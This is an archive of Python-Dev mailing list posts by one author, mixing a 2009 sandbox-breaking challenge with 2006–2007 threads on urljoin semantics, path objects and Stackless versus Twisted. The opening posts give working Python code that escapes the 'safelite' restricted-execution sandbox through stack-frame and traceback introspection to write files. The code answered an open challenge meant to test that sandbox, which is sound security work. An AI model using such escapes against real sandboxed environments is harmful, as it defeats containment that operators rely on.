Re: [Python-Dev] Challenge: Please break this! [Now with blog post]

2009-02-24 Thread Andrew Dalke
Another hole. Not as devious as some, but easy to fix with yet another
type check. And probably you want to get rid of "get_frame" from
safelite.

This trick notices 'buffering' is passed to open, which does an int
coerce of non-int objects. I can look up the stack frames and get
"open_file", which I can then use for whatever I want.

In this case, I used the hole to reimplement 'open' in its entirety.

import safelite

class GetAccess(object):
def __init__(self, filename, mode, buffering):
self.filename = filename
self.mode = mode
self.buffering = buffering
self.f = None

def __int__(self):
# Get access to the calling frame.
# (Strange that that function is available.)
frame = safelite.get_frame(1)

# Look at that nice function right there.
open_file = frame.f_locals["open_file"]

# Get around restricted mode
locals_d = {}
exec """
def breakout(open_file, filename, mode, buffering):
return open_file(filename, mode, buffering)
""" in frame.f_globals, locals_d
del frame

# Call the function
self.f = locals_d["breakout"](open_file, self.filename,
self.mode, self.buffering)

# Jump outta here
raise TypeError

def open(filename, mode="r", buffering=0):
get_access = GetAccess(filename, mode, buffering)
try:
safelite.FileReader("whatever", "r", get_access)
except TypeError:
return get_access.f

f = open("busted.txt", "w")
f.write("Broke out of jail!\n")
f.close()

print "Message is:", repr(open("busted.txt").read())


Andrew Dalke
da...@dalkescientific.com
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Challenge: Please break this! [Now with blog post]

2009-02-24 Thread Andrew Dalke
Another hole. Not as devious as some, but easy to fix with yet another
type check.

This trick notices 'buffering' is passed to open, which does an int
coerce of non-int objects. I can look up the stack frames and get
"open_file", which I can then use for whatever I want.

In this case, I used the hole to reimplement 'open' in its entirety.

import safelite

class GetAccess(object):
def __init__(self, filename, mode, buffering):
self.filename = filename
self.mode = mode
self.buffering = buffering
self.f = None

def __int__(self):
# Get access to the calling frame.
# (Strange that that function is available, but I
# could do it the old-fashioned way and raise/
# catch and exception)
frame = safelite.get_frame(1)

# Look at that nice function right there.
open_file = frame.f_locals["open_file"]

# Get around restricted mode
locals_d = {}
exec """
def breakout(open_file, filename, mode, buffering):
return open_file(filename, mode, buffering)
""" in frame.f_globals, locals_d
del frame

# Call the function
self.f = locals_d["breakout"](open_file, self.filename,
self.mode, self.buffering)

# Jump outta here
raise TypeError

def open(filename, mode="r", buffering=0):
get_access = GetAccess(filename, mode, buffering)
try:
safelite.FileReader("whatever", "r", get_access)
except TypeError:
return get_access.f

f = open("busted.txt", "w")
f.write("Broke out of jail!\n")
f.close()

print "Message is:", repr(open("busted.txt").read())


Andrew Dalke
da...@dalkescientific.com
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Challenge: Please break this! [Now with blog post]

2009-02-24 Thread Andrew Dalke
tav 
> But the challenge was about doing `from safelite import FileReader`.

Though it doesn't say so on the first post on this thread nor your page at
  http://tav.espians.com/a-challenge-to-break-python-security.html

It says "Now find a way to write to the filesystem from your
interpreter". Which is what I did.  Who's to say your final
implementation will be more secure ;)

But I see your point. Perhaps update the description for those
misguided souls like me?

> This is just a challenge to see if the model holds

I haven't been watching this discussion closely and I can't find
mention of this - is the goal to support only 2.x or also support
Python 3? Your model seems to assume 2.x only, and there may be 3.x
attacks that aren't considered in the challenge.

For example, in Python 3 I would use the __traceback__ method of the
exception object to reach in and get the open function.  That seems
morally equivalent to what I did.

I hacked out the parts of safelite.py which wouldn't work in Python3.
Following is a variation on the theme.

import safelite

try:
safelite.FileReader("/dev/null", "r", "x")
except TypeError as err:
frame = err.__traceback__.tb_next.tb_frame
frame.f_locals["open_file"]("test.txt", "w").write("done.")


> And instead of trying to make tb_frame go away, I'd like to add the
> following to my proposed patch of RESTRICTED attributes:
>
> * f_code
> * f_builtins
> * f_globals
> * f_locals

which of course would make the above no longer work.

Cheers,

Andrew
da...@dalkescientific.com
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Challenge: Please break this! [Now with blog post]

2009-02-24 Thread Andrew Dalke
On Tue, Feb 24, 2009 at 3:05 PM, tav  wrote:
> And instead of trying to make tb_frame go away, I'd like to add the
> following to my proposed patch of RESTRICTED attributes:
>
> * f_code
> * f_builtins
> * f_globals
> * f_locals
>
> That seems to do the trick...

A goal is to use this in App Engine, yes? Which uses cgitb to report
errors? Which needs these restricted frame attributes to report the
values of variables when the error occurred?

Andrew Dalke
da...@dalkescientific.com
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Path object design

2006-11-03 Thread Andrew Dalke
glyph:
> Path manipulation:
>
>  * This is confusing as heck:
>>>> os.path.join("hello", "/world")
>'/world'
>>>> os.path.join("hello", "slash/world")
>'hello/slash/world'
>>>> os.path.join("hello", "slash//world")
>'hello/slash//world'
>Trying to formulate a general rule for what the arguments to os.path.join
> are supposed to be is really hard.  I can't really figure out what it would
> be like on a non-POSIX/non-win32 platform.

Made trickier by the similar yet different behaviour of urlparse.urljoin.

 >>> import urlparse
 >>> urlparse.urljoin("hello", "/world")
 '/world'
 >>> urlparse.urljoin("hello", "slash/world")
 'slash/world'
 >>> urlparse.urljoin("hello", "slash//world")
 'slash//world'
 >>>

It does not make sense to me that these should be different.

   Andrew
   [EMAIL PROTECTED]

[Apologies to glyph for the dup; mixed up the reply-to.  Still getting
used to gmail.]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Path object design

2006-11-03 Thread Andrew Dalke
Martin:
> Just in case this isn't clear from Steve's and Fredrik's
> post: The behaviour of this function is (or should be)
> specified, by an IETF RFC. If somebody finds that non-intuitive,
> that's likely because their mental model of relative URIs
> deviate's from the RFC's model.

While I didn't realize that urljoin is only supposed to be used
with a base URL, where "base URL" (used in the docstring) has
a specific requirement that it be absolute.

I instead saw the word "join" and figured it's should do roughly
the same things as os.path.join.


>>> import urlparse
>>> urlparse.urljoin("file:///path/to/hello", "slash/world")
'file:///path/to/slash/world'
>>> urlparse.urljoin("file:///path/to/hello", "/slash/world")
'file:///slash/world'
>>> import os
>>> os.path.join("/path/to/hello", "slash/world")
'/path/to/hello/slash/world'
>>>

It does not.  My intuition, nowadays highly influenced by URLs, is that
with a couple of hypothetical functions for going between filenames and URLs:

os.path.join(absolute_filename, filename)
   ==
file_url_to_filename(urlparse.urljoin(
 filename_to_file_url(absolute_filename),
 filename_to_file_url(filename)))

which is not the case.  os.join assumes the base is a directory
name when used in a join: "inserting '/' as needed" while RFC
1808 says

   The last segment of the base URL's path (anything
   following the rightmost slash "/", or the entire path if no
   slash is present) is removed

Is my intuition wrong in thinking those should be the same?

I suspect it is. I've been very glad that when I ask for a directory
name that I don't need to check that it ends with a "/".  Urljoin's
behaviour is correct for what it's doing.  os.path.join is better for
what it's doing.  (And about once a year I manually verify the
difference because I get unsure.)

I think these should not share the "join" in the name.

If urljoin is not meant for relative base URLs, should it
raise an exception when misused? Hmm, though the RFC
algorithm does not have a failure mode and the result may
be a relative URL.

Consider

>>> urlparse.urljoin("http://blah.com/a/b/c";, "..")
'http://blah.com/a/'
>>> urlparse.urljoin("http://blah.com/a/b/c";, "../")
'http://blah.com/a/'
>>> urlparse.urljoin("http://blah.com/a/b/c";, "../..")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c";, "../../")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c";, "../../..")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../")
'http://blah.com/../'
>>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../..")  # What?!
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../../")
'http://blah.com/../../'
>>>


> Of course, there is also the chance that the implementation
> deviates from the RFC; that would be a bug.

The comment in urlparse

# XXX The stuff below is bogus in various ways...

is ever so reassuring.  I suspect there's a bug given the
previous code.  Or I've a bad mental model.  ;)

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Path object design

2006-11-05 Thread Andrew Dalke
Steve:
> > I'm darned if I know. I simply know that it isn't right for http resources.

/F:
> the URI specification disagrees; an URI that starts with "../" is per-
> fectly legal, and the specification explicitly states how it should be
> interpreted.

I have looked at the spec, and can't figure out how its explanation
matches the observed urljoin results.  Steve's excerpt trimmed out
the strangest example.

>>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../")
'http://blah.com/../'
>>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../..")  # What?!
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../../")
'http://blah.com/../../'
>>>

> (it's important to realize that "urijoin" produces equivalent URI:s, not
> file names)

Both, though, are "paths".  The OP, Mik Orr, wrote:

   I agree that supporting non-filesystem directories (zip files,
   CSV/Subversion sandboxes, URLs) would be nice, but we already have a
   big enough project without that.  What constraints should a Path
   object keep in mind in order to be forward-compatible with this?

Is the answer therefore that URLs and URI behaviour should not
place constraints on a Path object becuse they are sufficiently
dissimilar from file-system paths?  Do these other non-FS hierarchical
structures have similar differences causing a semantic mismatch?

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Path object design

2006-11-05 Thread Andrew Dalke
Martin:
> Unfortunately, you didn't say which of these you want explained.
> As it is tedious to write down even a single one, I restrain to the
> one with the What?! remark.
>
>  urlparse.urljoin("http://blah.com/a/b/c";, "../../../..")  # What?!
> > 'http://blah.com/'

The "What?!" is in context with the previous and next entries.  I've
reduced it to a simpler case

>>> urlparse.urljoin("http://blah.com/";, "..")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/";, "../")
'http://blah.com/../'
>>> urlparse.urljoin("http://blah.com/";, "../..")
'http://blah.com/'

Does the result make sense to you?  Does it make
sense that the last of these is shorter than the middle
one?  It sure doesn't to me.  I thought it was obvious
that there was an error; obvious enough that I didn't
bother to track down why - especially as my main point
was to argue there are different ways to deal with
hierarchical/path-like schemes, each correct for its
given domain.

> Please follow me through section 5 of
>
> http://www.ietf.org/rfc/rfc3986.txt

The core algorithm causing the "what?!" comes from
"reduce_dot_segments", section 5.2.4.  In parallel my
3 cases should give:

5.2.4 Remove Dot Segments
 remove_dot_segments("/..")r_d_s("/../")r_d_s("/../..")

 1. I = "/.."   I="/../"I="/../.."
O = ""  O=""O=""
 2A. (does not apply) 2A. (does not apply)  2A. (does not apply)
 2B. (does not apply) 2B. (does not apply)  2B. (does not apply)
 2C. O="" I="/"   2C. O="" I="/"2C. O="" I="/.."
 2A. (does not apply) 2A. (does not apply)   .. reduces to r_d_s("/..")
 2B. (does not apply) 2B. (does not apply)  3. Result "/"
 2C. (does not apply) 2C. (does not apply)
 2D. (does not apply) 2D. (does not apply)
 2E. O="/", I=""  2E. O="/", I=""
 3. Result: "/"   3. Result "/"

My reading of the RFC 3986 says all three examples should
produce the same result.  The fact that my "what?!" comment happens
to be correct according to that RFC is purely coincidental.

Then again, urlparse.py does *not* claim to be RFC 3986 compliant.
The module docstring is

"""Parse (absolute and relative) URLs.

See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding,
UC Irvine, June 1995.
"""

I tried the same code with 4Suite, which does claim compliance, and get

>>> import Ft
>>> from Ft.Lib import Uri
>>> Uri.Absolutize("..", "http://blah.com/";)
'http://blah.com/'
>>> Uri.Absolutize("../", "http://blah.com/";)
'http://blah.com/'
>>> Uri.Absolutize("../..", "http://blah.com/";)
'http://blah.com/'
>>>

The text of it's Uri.py says

This function is similar to urlparse.urljoin() and urllib.basejoin().
Those functions, however, are (as of Python 2.3) outdated, buggy, and/or
designed to produce results acceptable for use with other core Python
libraries, rather than being earnest implementations of the relevant
specs. Their problems are most noticeable in their handling of
same-document references and 'file:' URIs, both being situations that
come up far too often to consider the functions reliable enough for
general use.
"""
# Reasons to avoid using urllib.basejoin() and urlparse.urljoin():
# - Both are partial implementations of long-obsolete specs.
# - Both accept relative URLs as the base, which no spec allows.
# - urllib.basejoin() mishandles the '' and '..' references.
# - If the base URL uses a non-hierarchical or relative path,
#or if the URL scheme is unrecognized, the result is not
#always as expected (partly due to issues in RFC 1808).
# - If the authority component of a 'file' URI is empty,
#the authority component is removed altogether. If it was
#not present, an empty authority component is in the result.
# - '.' and '..' segments are not always collapsed as well as they
#should be (partly due to issues in RFC 1808).
# - Effective Python 2.4, urllib.basejoin() *is* urlparse.urljoin(),
#but urlparse.urljoin() is still based on RFC 1808.

In searching the archives
  http://mail.python.org/pipermail/python-dev/2005-September/056152.html

Fabien Schwob:
> I'm using the module urlparse and I think I've found a bug in the
> urlparse module. When you merge an url and a link
> like"../../../page.html" with urljoin, the new url created keep some
> "../" in it. Here is an example :
>
>  >>> import urlparse
>  >>> begin = "http://www.example.com/folder/page.html";
>  >>> end = "../../../otherpage.html"
>  >>> urlparse.urljoin(begin, end)
> 'http://www.example.com/../../otherpage.html'

Guido:
> You shouldn't be giving more "../" sequences than are possible. I find
> the current behavior acceptable.

(Aparently for RFC 1808 that's a valid answer; it was an implementation
choice in how to handle that case.)

While not directly relevant, postings like John J Lee's
 http://mail.python.org/pipermail/python-bugs-lis

Re: [Python-Dev] Path object design

2006-11-05 Thread Andrew Dalke
Me [Andrew]:
> > As this is not a bug, I have added the feature request 1591035 to SF
> > titled "update urlparse to RFC 3986".  Nothing else appeared to exist
> > on that specific topic.

Martin:
> Thanks. It always helps to be more specific; being less specific often
> hurts.

So does being more specific.  I wasn't trying to report a bug in
urlparse.  I figured everyone knew the problems existed.  The code
comments say so and various back discussions on this list say so.

All I wanted to do what point out that two seemingly similar problems -
path traversal of hierarchical structures - had two different expected
behaviors.  Now I've spent entirely too much time on specifics I didn't
care about and didn't think were important.

I've also been known to do the full report and have people ignore what
I wrote because it was too long.

> I find there is a difference between "urllib behaves
> non-intuitively" and "urllib gives result A for parameters B and C,
> but should give result D instead". Can you please add specific examples
> to your report that demonstrate the difference between implemented
> and expected behavior?

No.

I consider the "../" cases to be unimportant edge cases and
I would rather people fixed the other problems highlighted in the
text I copied from 4Suite's Uri.py -- like improperly allowing a
relative URL as the base url, which I incorrectly assumed was
legit - and that others have reported on python-dev, easily found
with Google.

If I only add test cases for "../" then I believe that that's all that
will be fixed.

Given the back history of this problem and lack of followup I
also believe it won't be fixed unless someone develops a brand
new module, from scratch, which will be added to some future
Python version.  There's probably a compliance suite out there
to use for this sort of task.  I hadn't bothered to look as I am
no more proficient than others here at Google.

Finally, I see that my report is a dup.  SF search is poor.  As
Nick Coghlan reported, Paul Jimenez has a replacement for urlparse.
Summarized in
 http://www.python.org/dev/summary/2006-04-01_2006-04-15/
It was submitted in spring as a patch - SF# 1462525 at
  
http://sourceforge.net/tracker/index.php?func=detail&aid=1462525&group_id=5470&atid=305470
which I didn't find in my earlier searching.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Path object design

2006-11-06 Thread Andrew Dalke
Martin:
> It still should be possible to come up with examples for these as
> well, no? For example, if you pass a relative URI as the base
> URI, what would you like to see happen?

Until two days ago I didn't even realize that was an incorrect
use of urljoin.  I can't be the only one.  Hence, raise an
exception - just like 4Suite's Uri.py does.

> That's true. Actually, it's probably not true; it will only get fixed
> if some volunteer contributes a fix.

And it's not I.  A true fix is a lot of work.  I would rather use Uri.py,
now that I see it handles everything I care about, and then some.
Eg, file name <-> URI conversion.

> So do you think this patch meets your requirements?

# new
>>> uriparse.urljoin("http://spam/";, "foo/bar")
'http://spam//foo/bar'
>>>

# existing
>>> urlparse.urljoin("http://spam/";, "foo/bar")
'http://spam/foo/bar'
>>>

No.  That was the first thing I tried.  Also found

>>> urlparse.urljoin("http://blah";, "/spam/")
'http://blah/spam/'
>>> uriparse.urljoin("http://blah";, "/spam/")
'http://blah/spam'
>>>

I reported these on the  patch page.  Nothing else strange
came up, but I did only try http urls and not the others.

My "requirements", meaning my vague, spur-of-the-moment thoughts
without any research or experimentation to determing their validity,
are different than those for Python.

My real requirements are met by the existing code.

My imagined ones include support for edge cases, the idna
codec, unicode, and real-world use on a variety of OSes.

4Suite's Uri.py seems to have this.  Eg, lots of edge-case
code like

# On Windows, ensure that '|', not ':', is used in a drivespec.
if os.name == 'nt' and scheme == 'file':
path = path.replace(':','|',1)

Hence the uriparse.py patch does not meet my hypothetical
requirements .

Python's requirements are probably to get closer to the spec.
In which case yes, it's at least as good as and likely generally
better than the existing module, modulo a few API naming debates
and perhaps some rough edges which will be found when put into use.

And perhaps various arguments about how bug compatible it should be
and if the old code should be available as well as the new one,
for those who depend on the existing 1808-allowed implementation
dependent behavior.

For those I have not the experience to guide me and no care to push
the debate.  I've decided I'm going to experiment using 4Suite's Uri.py
for my code because it handles things I want which are outside of
the scope of uriparse.py

> This topic (URL parsing) is not only inherently difficult to
> implement, it is just as tedious to review. Without anybody
> reviewing the contributed code, it's certain that it will never
> be incorporated.

I have a different opinion.

Python's url manipulation code is a mess.  urlparse, urllib, urllib2.
Why is "urlencode" part of urllib and not urllib2?  For that matter,
urllib is labeled 'Open an arbitrary URL' and not 'and also do
manipulations on parts of URLs."

I don't want to start fixing code because doing it the way I want to
requires a new API and a much better understanding of the RFCs
than I care about, especially since 4Suite and others have already
done this.

Hence I would say to just grab their library.  And perhaps update the
naming scheme.

Also, urlgrabber and pycURL are better for downloading arbitrary
URIs.  For some definitions of "better".

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Path object design

2006-11-06 Thread Andrew Dalke
Andrew:
> >>> urlparse.urljoin("http://blah.com/";, "..")
> 'http://blah.com/'
> >>> urlparse.urljoin("http://blah.com/";, "../")
> 'http://blah.com/../'
> >>> urlparse.urljoin("http://blah.com/";, "../..")
> 'http://blah.com/'

/F:
> as I said, today's urljoin doesn't guarantee that the output is
> the *shortest* possible way to represent the resulting URI.

I didn't think anyone was making that claim.  The module claims
RFC 1808 compliance.  From the docstring:

DESCRIPTION
See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding,
UC Irvine, June 1995.

Now quoting from RFC 1808:

   5.2.  Abnormal Examples

   Although the following abnormal examples are unlikely to occur in
   normal practice, all URL parsers should be capable of resolving them
   consistently.  Each example uses the same base as above.

   An empty reference resolves to the complete base URL:

  <>= http://a/b/c/d;p?q#f>

   Parsers must be careful in handling the case where there are more
   relative path ".." segments than there are hierarchical levels in the
   base URL's path.

My claim is that "consistent" implies "in the spirit of the rest of the RFC"
and "to a human trying to make sense of the results" and not only
mean "does the same thing each time."  Else

>>> urljoin("http://blah.com/";, "../../..")
'http://blah.com/there/were/too/many/dot-dot/path/elements/in/the/relative/url'

would be equally consistent.

>>> for rel in ".. ../ ../.. ../../ ../../.. ../../../ ../../../..".split():
...   print repr(rel), repr(urlparse.urljoin("http://blah.com/";, rel))
...
'..' 'http://blah.com/'
'../' 'http://blah.com/../'
'../..' 'http://blah.com/'
'../../' 'http://blah.com/../../'
'../../..' 'http://blah.com/../'
'../../../' 'http://blah.com/../../../'
'../../../..' 'http://blah.com/../../'

I grant there is a consistency there.  It's not one most would have
predicted beforehand.

Then again, "should" is that wishy-washy "unless you've got a good
reason to do it a different way" sort of constraint.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Twisted Isn't Specific (was Re: Trial balloon: microthreads library in stdlib)

2007-02-15 Thread Andrew Dalke
I was the one on the Stackless list who last September or so
proposed the idea of monkeypatching and I'm including that
idea in my presentation for PyCon.  See my early rough draft
at http://www.stackless.com/pipermail/stackless/2007-February/002212.html
which contains many details about using Stackless, though
none on the Stackless implementation. (A lot on how to tie things together.)

So people know, I am an applications programmer and not a
systems programmer.  Things like OS-specific event mechanisms
annoy and frustrate me.  If I could do away with hardware and
still write useful programs I would.

I have tried 3 times to learn Twisted.  The first time I found
and reported various problems and successes.  See emails at
  http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/thread.html
The second time was to investigate a way to report upload
progress: http://twistedmatrix.com/trac/ticket/288
and the third was to compare Allegra and Twisted
  
http://www.dalkescientific.com/writings/diary/archive/2006/08/28/levels_of_abstraction.html

In all three cases I've found it hard to use Twisted because
the code didn't do as I expected it to do and when something
went wrong I got results which were hard to interpret.  I
believe others have similar problems and is one reason Twisted
is considered to be "a big, complicated, inseparable hairy mess."



I find the Stackless code also hard to understand.  Eg,
I don't know where the watchdog code is for the "run()"
command.  It uses several layers of macros and I haven't
been able get it straight in my head.  However, so far
I've not run into strange errors in Stackless that I
have in Twisted.

I find the normal Python code relatively easy to understand.


Stackless only provides threadlets.  It does no I/O.
Richard Tew developed a "stacklesssocket" module which emulates
the API for the stdlib "socket" module.  I tweaked it a
bit and showed that by doing the monkeypatch

  import stacklesssocket
  import sys
  sys.modules["socket"] = stacklesssocket

then code like "urllib.urlopen" became Stackless compatible.
Eg, in my PyCon talk draft I show something like


import slib
# must monkeypatch before any other module imports "socket"
slib.use_monkeypatch()

import urllib2
import time
import hashlib

def fetch_and_reverse(host):
 t1 = time.time()
 s = urllib2.urlopen("http://"+host+"/";).read()[::-1]
 dt = time.time() - t1
 digest = hashlib.md5(s).hexdigest()
 print "hash of %r/ = %s in %.2f s" % (host, digest, dt)

slib.main_tasklet(fetch_and_reverse)("www.python.org")
slib.main_tasklet(fetch_and_reverse)("docs.python.org")
slib.main_tasklet(fetch_and_reverse)("planet.python.org")
slib.run_all()

where the three fetches occur in parallel.

The choice of asyncore is, I think, done because 1) it
prevents needing an external dependency, 2) asyncore is
smaller and easier to understand than Twisted, and
3) it was for demo/proof of concept purposes.  While
tempting to improve that module I know that Twisted
has already gone though all the platform-specific crap
and I don't want to go through it again myself.  I don't
want to write a reactor to deal with GTK, and one for
OS X, and one for ...


Another reason I think Twisted is considered "tangled-up
Deep Magic, only for Wizards Of The Highest Order" is because
it's infused with event-based processing.  I've done a lot
of SAX processing and I can say that few people think that
way or want to go through the process of learning how.

Compare, for example, the following

  f = urllib2.urlopen("http://example.com/";)
  for i, line in enumerate(f):
print ("%06d" % i), repr(line)

with the normal equivalent in Twisted or other
async-based system.

Yet by using the Stackless socket monkeypatch, this
same code works in an async framework.  And the underlying
libraries have a much larger developer base than Twisted.
Want NNTP?  "import nntplib"  Want POP3?  "import poplib"
Plenty of documentation about them too.

On the Stackless mailing list I have proposed someone work
on a talk for EuroPython titled "Stackless and Twisted".
 Andrew Francis has been looking into how to do that.

All the earlier quotes were lifted from glyph.  Here's another:
>  When you boil it down, Twisted's event loop is just a
>  notification for "a connection was made", "some data was
>  received on a connection", "a connection was closed", and
>  a few APIs to listen or initiate different kinds of
>  connections, start timed calls, and communicate with threads.
>  All of the platform details of how data is delivered to the
>  connections are abstracted away..  How do you propose we
>  would make a less "specific" event mechanism?

What would I need to do to extract this Twisted core so
I could replace asyncore?  I know at minimum I need
"twisted.internet" and "twisted.python" (the latter for
logging) and "twisted.persisted" for "styles.Ephemeral".

But I say this hesitantly recalling the frustrations
I had in dealing with a co

Re: [Python-Dev] Trial balloon: microthreads library in stdlib

2007-02-15 Thread Andrew Dalke
On 2/14/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote
in response to [EMAIL PROTECTED]:
> As far as I can tell, you still haven't even clearly expressed what your
> needs are, let alone whether or not Twisted is suitable.  In the reply
> you're citing, you said that "this" sounded like something "low level" that
> "twisted would be written on top of" - but the "this" you were talking
> about, based on your previous messages, sounded like monkeypatching the
> socket and asyncore modules to provide asynchronous file I/O based on the
> platform-specific IOCP API for Windows.

I don't know Richard's needs nor requirements.  I do know the mechanism
of the monkeypatch he's talking about.  I describe it a bit in my draft
for my Stackless talk at PyCon
  http://www.stackless.com/pipermail/stackless/2007-February/002212.html

It uses asyncore for the I/O and a scheduler which can figure out if
there are other running tasklets and how long is needed until the next
tasklet needs to wake up.

Yes, this is another reactor.  Yes, it's not widely cross-platform.
Yes, it doesn't work with gtk and other GUI frameworks.  Yes,
as written it doesn't handle threads.

But also yes, it's a different style of writing reactors because of
how Stackless changes the control flow.

I and others would like to see something like the "stacklesssocket"
implemented on top of Twisted. Andrew Francis is looking in to it
but I don't know to what degree of success he's had.  Err, looking
through the email archive, he's has had some difficulties in doing
a Twisted/Stackless integration.  I don't think Twisted people
understand Stackless well enough (nor obviously he Twisted) or
what he's trying to do.

> >It is a large dependency and it is a secondary framework.
>
> Has it occurred to you that it is a "large" dependency not because we like
> making bloated and redundant code, but because it is doing something that is
> actually complex and involved?

Things like Twisted's support for NNTP, POP3, etc. aren't needed
with the monkeypatch approach because the standard Python
libraries will work, with Stackless and the underlying asyc library
collaborating under the covers.  So those parts of Twisted aren't
needed or relevant.

Twisted is, after all, many things.


> I thought that I provided several reasons before as well, but let me state
> them as clearly as I can here.  Twisted is a large and mature framework with
> several years of development and an active user community.  The pluggable
> event loop it exposes is solving a hard problem, and its implementation
> encodes a lot of knowledge about how such a thing might be done.  It's also
> tested on a lot of different platforms.
>
> Writing all this from scratch - even a small subset of it - is a lot of
> work, and is unlikely to result in something robust enough for use by all
> Python programs without quite a lot of effort.  It would be a lot easier to
> get the Twisted team involved in standardizing event-driven communications
> in Python.  Every other effort I'm aware of is either much smaller, entirely
> proprietary, or both.  Again, I would love to be corrected here, and shown
> some other large event-driven framework in Python that I was heretofore
> unaware of.

Sorry for the long quote; wasn't sure how to trim it.

I made this point elsewhere and above but feel it's important
enough to emphasize once more.

Stackless lets people write code which looks like blocking code
but which is not.  The blocking functions are forwarded to the
reactor, which does whatever it's supposed to do, and the results
returned.

Because most Python networking code will work unchanged
(assuming changes to the underlying APIs to work with
Stackless, as we hack now through monkeypatches), a
microthreads solution almost automatically and trivially gains
a large working code base, documentation, and active developer
base.

There does not need to be "some other large event-driven
framework in Python" because all that's needed is the 13kLOC
of reactor code from twisted.internet and not 140+kLOC in
all of Twisted.

>  Standardization is much easier to achieve when you have
> multiple interested parties with different interests to accommodate.  As
> Yitzhak Rabin used to say, "you don't engage in API standardization with
> your friends, you engage in API standardization with your enemies" - or...
> something like that.

I thought you made contracts even with -- or especially with -- your
friends regarding important matters so that both sides know what
they are getting into and so you don't become enemies in the future.

> You say that you weren't proposing an alternate implementation of an event
> loop core, so I may be reacting to something you didn't say at all.
>  However, again, at least Tristan thought the same thing, so I'm not the
> only one.

For demonstration (and for my case pedagogical reasons) we have
an event core loop.  I would rather pull out the parts I need from
Twisted.  I don't know how.  I don't

Re: [Python-Dev] Twisted Isn't Specific (was Re: Trial balloon: microthreads library in stdlib)

2007-02-15 Thread Andrew Dalke
> On Thu, 15 Feb 2007 10:46:05 -0500, "A.M. Kuchling" <[EMAIL PROTECTED]> wrote:
> >It's hard to debug the resulting problem.  Which level of the *12*
> >levels in the stack trace is responsible for a bug?  Which of the *6*
> >generic calls is calling the wrong thing because a handler was set up
> >incorrectly or the wrong object provided?  The code is so 'meta' that
> >it becomes effectively undebuggable.

On 2/15/07, Jean-Paul Calderone <[EMAIL PROTECTED]> wrote,
> I've debugged plenty of Twisted applications.  So it's not undebuggable. :)

Hence the word "effectively".  Or are you offering to be on-call
within 5 minutes for anyone wanting to debug code?  Not very
scalable that.

The code I was talking about took me an hour to track down
and I could only find the location be inserting a "print traceback"
call to figure out where I was.

> Application code tends to reside at the bottom of the call stack, so Python's
> traceback order puts it right where you're looking, which makes it easy to
> find.

As I also documented, Twisted tosses a lot of the call stack.  Here
is the complete and full error message I got:

Error: [Failure instance: Traceback (failure with no frames):
twisted.internet.error.ConnectionRefusedError: Connection was refused
by other side: 22: Invalid argument.
]

I wrote the essay at
  
http://www.dalkescientific.com/writings/diary/archive/2006/08/28/levels_of_abstraction.html

to, among others, show just how hard it is to figure things
out in Twisted.

>  For any bug which causes something to be set up incorrectly and only
> later manifests as a traceback, I would posit that whether there is 1 frame or
> 12, you aren't going to get anything useful out of the traceback.

I posit that tracebacks are useful.

Consider:

def blah():
  make_network_request("A")
  make_network_request("B")

where "A" and "B" are encoded as part of a HTTP POST payload
to the same URI.

If there's an error in the network connection - eg, the implementation
for "B" on the server dies so the connection closes w/o a response -
then knowning that the call for "B" failed and not "A" is helpful
during debugging.

The low level error message cannot report that.  Yes, I could put
my own try blocks around everything and contextualize all of the
error messages so they are semantically correct for the given
level of code.  But that I would be a lot of code, hard to test, and
not cost effective.

> Standard practice here is just to make exception text informative,
> I think,

If you want to think of it as "exception text" then consider that
the stack trace is "just" more text for the message.

>but this is another general problem with Python programs
> and event loops, not one specific to either Twisted itself or the
> particular APIs Twisted exposes.

The thread is "Twisted Isn't Specific", as a branch of a discussion
on microthreads in the standard library.  As someone experimenting
with Stackless and how it can be used on top of an async library
